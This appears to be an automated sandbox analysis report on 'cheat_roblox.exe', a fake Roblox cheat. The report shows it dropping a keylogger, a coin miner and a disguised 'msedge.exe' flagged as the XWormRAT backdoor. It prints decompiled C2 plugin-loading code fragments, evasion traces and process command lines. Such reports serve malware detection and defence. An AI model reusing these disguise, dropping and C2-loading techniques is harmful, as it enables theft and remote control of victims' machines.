            Source: C:\Users\user\Desktop\cheat_roblox.exe, Section loaded: version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, apphelp.dll
            Source: C:\Windows\System32\cmd.exe, Section loaded: cmdext.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, ndfapi.dll, wdi.dll, iphlpapi.dll, duser.dll, xmllite.dll, atlthunk.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.shell.servicehostbuilder.dll, onecoreuapcommonproxystub.dll, ieframe.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, windows.staterepositoryps.dll, edputil.dll, secur32.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Section loaded: wininet.dll, iphlpapi.dll, powrprof.dll, winmm.dll, cryptbase.dll, umpdc.dll, cryptsp.dll, rsaenh.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, uxtheme.dll, windowscodecs.dll, propsys.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, d3d11.dll, dxgi.dll, resourcepolicyclient.dll, d3d10warp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll
            Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll, wldp.dll
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
            Source: C:\Windows\System32\cmd.exe | Automated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Automated click: OK
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: cheat_roblox.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: cheat_roblox.exe | Static file information: File size 2675335 > 1048576
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cheat_roblox.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cheat_roblox.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.8.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD565E9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: cheat_roblox.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cheat_roblox.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cheat_roblox.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cheat_roblox.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cheat_roblox.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory
            Source: RobloxPlayerInstaller.exe.0.dr | Static PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\Desktop\cheat_roblox.exe | File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5872578
            Source: cheat_roblox.exe | Static PE information: section name: .didat
            Source: cheat_roblox.exe | Static PE information: section name: _RDATA
            Source: Google.Widevine.CDM.dll.8.dr | Static PE information: section name: .00cfg
            Source: Google.Widevine.CDM.dll.8.dr | Static PE information: section name: .gxfg
            Source: Google.Widevine.CDM.dll.8.dr | Static PE information: section name: .retplne
            Source: Google.Widevine.CDM.dll.8.dr | Static PE information: section name: .voltbl
            Source: Google.Widevine.CDM.dll.8.dr | Static PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E95166 push rsi; retf 0_2_00007FF693E95167
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E95156 push rsi; retf 0_2_00007FF693E95157
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_01233175 push ecx; ret 4_2_01233188
            Source: Keyloger.exe.0.dr | High entropy of concatenated method names (10 .cs files)
            Source: C:\Users\user\Desktop\cheat_roblox.exe | File created: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe | File created: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe | File created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe | File created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dll
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | File created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_2ACC2.log
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | RDTSC instruction interceptor: First address: 10239F0 second address: 1023A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Window / User API: threadDelayed 9646
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exe
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_4-1888
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332 | Thread sleep time: -44981s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332 | Thread sleep time: -46239s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332 | Thread sleep time: -57753s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | File Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformation
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E7B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E640BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E640BC
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E8FCA0 FindFirstFileExA,0_2_00007FF693E8FCA0
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E816A4 VirtualQuery,GetSystemInfo,0_2_00007FF693E816A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Thread delayed: delay time: 44981
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Thread delayed: delay time: 46239
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Thread delayed: delay time: 57753
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\coin.bat
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\Keyloger.exe
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Roblox
            Source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56711000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.2129059301.0000000002899000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127732650.0000000002093000.00000002.00000001.01000000.00000009.sdmp, cacert.pem.4.dr | Binary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
            Source: RobloxPlayerInstaller.exe, 00000004.00000003.3808182999.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.3808215447.00000000028AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E83170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF693E83170
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_0125D0F8 mov eax, dword ptr fs:[00000030h] 4_2_0125D0F8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_0125D13C mov eax, dword ptr fs:[00000030h] 4_2_0125D13C
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_012543AC mov ecx, dword ptr fs:[00000030h] 4_2_012543AC
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E90D20 GetProcessHeap,0_2_00007FF693E90D20
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E82510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF693E82510
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E83354 SetUnhandledExceptionFilter,0_2_00007FF693E83354
            Source: C:\Users\user\Desktop\cheat_roblox.exe | Code function: 0_2_00007FF693E876D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF693E876D8
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_01232F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_01232F78
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | Code function: 4_2_0123E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0123E378
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe "C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E958E0 cpuid 0_2_00007FF693E958E0
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF693E7A2CC
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E80754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E80754
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E651A4 GetVersionExW,0_2_00007FF693E651A4
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match File source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: cheat_roblox.exe PID: 3192, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match File source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: cheat_roblox.exe PID: 3192, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 22 Masquerading | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 11 Process Injection | 11 Virtualization/Sandbox Evasion | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 12 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Software Packing | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 126 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 File Deletion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1484385, Sample: cheat_roblox.exe, Startdate: 30/07/2024, Architecture: WINDOWS, Score: 52 (graph image not reproduced)

            Source | Detection | Scanner | Label | Link
            cheat_roblox.exe | 59% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            cheat_roblox.exe | 100% | Joe Sandbox ML

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Avira | TR/Spy.Gen
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\ msedge.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\Keyloger.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | 0% | ReversingLabs
            C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dll | 0% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            counter.yadro.ru | 88.212.201.204 | true | false |  | unknown
